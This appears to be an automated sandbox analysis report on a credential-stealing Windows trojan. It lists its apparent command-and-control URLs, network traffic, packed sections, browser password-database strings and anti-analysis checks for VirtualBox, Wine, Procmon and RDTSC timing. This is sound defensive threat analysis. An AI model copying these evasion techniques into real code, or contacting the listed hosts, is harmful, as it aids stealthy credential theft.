                Source: mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apimI
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apip
                Source: mG83m82qhF.exe, 00000000.00000003.1477122557.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apite
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/mI
                Source: mG83m82qhF.exe, 00000000.00000003.1452641021.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/ou
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi5I
                Source: mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/piEH
                Source: mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/s
                Source: mG83m82qhF.exe, 00000000.00000003.1456773192.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630482824.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1456317993.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454484117.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455686356.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454724980.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454957001.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455318191.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455516828.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454264424.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455783102.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, 
mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apiyr
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49727 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49733 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49741 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49763 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49769 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 52.217.136.89:443 -> 192.168.2.10:49775 version: TLS 1.2

                System Summary

                Source: mG83m82qhF.exeStatic PE information: section name:
                Source: mG83m82qhF.exeStatic PE information: section name: .rsrc
                Source: mG83m82qhF.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
                Source: mG83m82qhF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: mG83m82qhF.exeStatic PE information: Section: ZLIB complexity 0.997418129280822
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7704
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ccc1f99-0da8-45a5-8274-4fb77917e5afJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mG83m82qhF.exe, 00000000.00000003.1375854213.0000000005219000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375695924.0000000005236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: mG83m82qhF.exeVirustotal: Detection: 54%
                Source: mG83m82qhF.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile read: C:\Users\user\Desktop\mG83m82qhF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\mG83m82qhF.exe "C:\Users\user\Desktop\mG83m82qhF.exe"
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: version.dllJump to behavior
                Source: mG83m82qhF.exe; Static file information: File size 2982400 > 1048576
                Source: mG83m82qhF.exe; Static PE information: Raw size of elrlqfzp is bigger than: 0x100000 < 0x2b0200

                Data Obfuscation

                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Unpacked PE file: 0.2.mG83m82qhF.exe.410000.0.unpack :EW;.rsrc :W;.idata :W;elrlqfzp:EW;bgznktwl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;elrlqfzp:EW;bgznktwl:EW;.taggant:EW;
                Source: initial sample; Static PE information: section where entry point is pointing to: .taggant
                Source: mG83m82qhF.exe; Static PE information: real checksum: 0x2e1b0e should be: 0x2e54e7
                Source: mG83m82qhF.exe; Static PE information: section name:
                Source: mG83m82qhF.exe; Static PE information: section name: .rsrc
                Source: mG83m82qhF.exe; Static PE information: section name: .idata
                Source: mG83m82qhF.exe; Static PE information: section name: elrlqfzp
                Source: mG83m82qhF.exe; Static PE information: section name: bgznktwl
                Source: mG83m82qhF.exe; Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Code function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Code function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Code function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: mG83m82qhF.exe; Static PE information: section name: entropy: 7.981487191884987

                Boot Survival

                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\mG83m82qhF.exe; System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6153CE second address: 6153D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6153D2 second address: 6153D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615702 second address: 615706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615794 second address: 6157A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6157A1 second address: 6157A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615865 second address: 61586A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61586A second address: 615880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F06687C5EECh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6158F3 second address: 6158F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6158F8 second address: 615928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F06687C5EF9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, EA74h 0x00000012 push eax 0x00000013 pushad 0x00000014 jbe 00007F06687C5EECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E34 second address: 615E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E38 second address: 615E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E3E second address: 615E54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0668FAD1FAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E54 second address: 615E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E58 second address: 615EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3338h], ebx 0x00000015 push 00000000h 0x00000017 jmp 00007F0668FAD204h 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f mov si, bx 0x00000022 mov ebx, dword ptr [ebp+122D2EECh] 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EA2 second address: 615EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EA6 second address: 615EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EAA second address: 615EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EB0 second address: 615EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6167D7 second address: 6167DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6167DD second address: 61685B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0668FAD1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0668FAD1F8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D361Ch], edx 0x0000002d push 00000000h 0x0000002f mov edi, edx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F0668FAD1F8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 js 00007F0668FAD1F6h 0x00000058 popad 0x00000059 jo 00007F0668FAD1F8h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61685B second address: 61686A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06687C5EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6182DE second address: 6182E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 617FBE second address: 617FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 618ABF second address: 618AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
